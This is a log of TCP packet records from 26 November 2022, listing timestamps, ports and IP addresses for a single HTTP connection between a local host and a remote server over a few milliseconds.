Nov 26, 2022 11:17:42.401245117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401252985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401266098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401273012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401283979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401292086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401302099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401309013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401320934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401335001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401335001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401340008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401355028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401357889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401376009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401376963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401391983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401393890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401412010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401412964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401431084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401432037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401449919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401453018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401469946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401469946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401487112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401488066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401504993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401511908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401523113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401527882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401540041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401544094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401559114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401573896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401582003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401582003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401590109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401602030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401609898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401619911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401628017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401637077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401645899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401662111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401663065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401664972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401681900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401683092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401705027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401724100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401731014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401741028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401750088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401755095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401772022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401773930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401793003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401810884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401808023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401829004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401829958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401848078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401854038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401854038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401866913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401873112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401885033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401890993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401902914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401906013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401921034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401922941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401938915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401941061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401957035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401968956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401968956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.401974916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401993036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.401993036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402012110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402012110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402029037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402048111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402064085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402065992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402064085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402064085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402085066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402096033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402096033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402103901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402117968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402122021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402134895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402139902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402158022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402159929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402175903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402179956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402198076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402215004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402232885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402251959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402268887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402287006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402302980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402302980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402306080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402302980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402302980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402323008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402338028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402340889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402359009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402368069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402376890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402385950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402395010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402414083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402431965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402435064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402435064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402435064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402450085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402467966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402472973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402486086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402494907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402508974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402513981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402533054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402548075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402549982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402565956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402568102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402585983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402601004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402605057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402618885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402626038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402637005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402646065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402656078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402666092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402678967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402678967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402683973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402702093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402719975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402724981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402736902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402745962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402755976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402774096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402775049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402790070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402807951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402818918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402826071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402841091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402844906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402857065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402863979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402889013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402892113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402910948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402914047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402930975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402971029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402971029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.402985096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.402998924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403002977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403021097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403023005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403038025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403042078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403055906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403059959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403074026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403078079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403091908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403094053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403110981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403111935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403126955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403131008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403146029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403150082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403162956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403170109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403184891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403187990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403206110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403206110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403223038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403223991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403242111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403242111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403258085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403259993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403274059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403280020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403296947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403300047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403316975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403317928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403335094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403336048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403352022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403353930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403369904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403372049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403387070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403388977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403407097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403409004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403425932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403426886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403443098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403444052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403481007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403481007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403481007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403497934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403516054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403536081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403542995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403554916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403573036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403584957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403584957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403590918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403609037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403614998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403615952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403630018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403639078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403639078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403650045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403661966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403669119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403683901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403687954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403702021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403707981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403723955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403727055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403740883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403745890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403759956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403764009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403780937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403784990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403796911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403804064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403824091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403844118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403844118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403844118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403862000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403866053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403881073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403899908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403899908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403918028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403919935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403935909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403939009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403955936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403955936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.403959036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403976917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.403995991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404012918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404019117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404019117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404019117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404031992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404050112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404068947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404073000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404073000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404073000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404088974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404108047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404126883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404139996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404139996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404139996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404145956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404165030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404172897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404172897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404184103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404194117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404210091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404227972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404246092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404254913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404267073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404274940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404284954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404289961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404304981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404304981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404325008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404328108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404342890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404344082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404364109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404381990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404396057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404396057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404417992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404428959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404436111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404449940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404454947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404474020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404475927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404495955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404504061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404514074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404527903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404536963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404541969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404556990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404571056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404593945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404608011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404620886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404634953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404654980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404668093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404686928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404700994 CET	49707	80	192.168.2.5	66.235.200.147
